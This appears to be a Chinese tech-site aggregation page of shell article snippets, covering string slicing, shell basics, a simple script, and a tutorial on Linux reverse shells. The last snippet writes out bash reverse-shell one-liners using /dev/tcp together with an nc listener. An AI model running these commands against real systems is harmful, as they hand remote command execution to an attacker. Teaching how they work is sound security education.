首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

shell字符串截取

利用tr 指令实现字符替换 tr "oldSpilt" "newSpilt" 测试字符串 var=1234567890abcedef1203 1、使用#截取0以后的内容 echo ${var#*0} 结果...:abcedef1203 #表示操作符,*0表示从左往右找到第一个0,截取0之后的所有字符 echo ${var##*0} 结果:3 #表示操作符,*0表示从右往左找到第一个0,截取0之后的所有字符 2...、使用%截取 echo ${var%0*} 结果:1234567890abcedef12 %表示操作符,0*表示从右往左找到第一个0,截取0之前的所有字符 echo ${var%%0*} 结果:123456789...%表示操作符,0*表示从左往右找到第一个0,截取0之前的所有字符 3、根据索引来截取 echo ${var:0:7} 结果:1234567 其中的 0 表示左边第一个字符开始,7 表示字符的总个数。...echo ${var:0-7} 结果:def1203 如果不加字符个数就截取剩下的所有字符

1.4K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    shell中的字符串截取方法

    shell中的字符串截取方法介绍 shell中大抵有八种截取字符串的方法,这里简单总结一下: 假设有变量 str=http://www.baidu.com/12345.html 1. # 号截取,删除左边字符...表示从左边开始删除第一个 // 号及左边的所有字符 字符串:http://www.baidu.com/12345.html 即删除 http:// 结果是 :www.baidu.com/12345.html 2. ## 号截取...%号截取,删除右边字符,保留左边字符 echo ${var%/*} %/* 表示从右边开始,删除第一个 / 号及右边的字符 字符串:http://www.baidu.com/12345.html 结果是...:http://www.baidu.com 4. %% 号截取,删除右边字符,保留左边字符 echo ${var%%/*} %%/* 表示从右边开始,删除最后(最左边)一个 / 号及右边的字符 字符串:

    5.2K10

    Linux——shell

    什么是shellshell是系统的用户界面,提供了用户与内核进行交互操作的一种接口(命令解释器) 。它接收用户输入的命令并把它送入内核去执行。起着用户与系统之间进行交互的作用。 ?...shell的功能: 命令行解释 命令的多种执行顺序 通配符 命令补全、别名机制、命令历史 I/O重定向 管道 命令替换(` ` 或$( ) ) shell编程语言 shell可以执行——内部命令、外部命令...shell命令分为: 内部(内置)命令 内部命令是shell本身包含的一些命令,这些内部命令的代码是整个shell代码的一个组成部分; 内部命令的执行是shell通过执行自己的代码中的相应部分来完成的...外部(外置)命令 外部命令的代码则存放在一些二进制的可执行文件或者shell脚本中; 外部命令执行时,shell会在文件系统中指定的一些目录去搜索相应的文件,然后调入内存执行。...shell变量PATH中 ?

    10.7K30

    linux shell编程

    什么是shell  shell扮演者操作系统内核和用户的中间人的角色,用户通过键入shell command,然后shell通过解析用户输入,然后将请求转发给操作系统的内核进行处理。 1....还是hello world程序  首先使用vim编辑器(或者是linux下任意的文本编辑器)编写文件helloshell.sh(没有必要使用.sh后缀名):  #!.../bin/sh                                osch=0 echo "1. unix(sun os)" echo "2. linux(red hat)" echo ...        #         # nested if         if [ $osch -eq 2 ]         then                 echo "you pick up linux..."         else                 echo "what you donot like unix/linux"         fi fi #!

    12K30

    Linux反弹shell

    2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell...的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp 2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容...,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式shell了 &:标准错误输出重定向输出 0>&1:简单一点理解就是将我们在攻击机输入的命令当成靶机输入...,然后靶机返回内容时又重定向攻击机,也就是交互界面,打开了一个shell窗口,随意可以在攻击机执行命令,然后在攻击机输出结果,这么一个意思 0:标准输入 1:标准输出 2:标准错误输出 &:是为了区分标准输出和文件描述符...2>&1 和上面的效果一样 1.4fourth bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 值得一提的是,">&"相当于"2>&1",标准错误输出 一个标准的反弹shell

    10.4K00

    扫码

    添加站长 进交流群

    领取专属 10元无门槛券

    手把手带您无忧上云

    扫码加入开发者社群

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭
      领券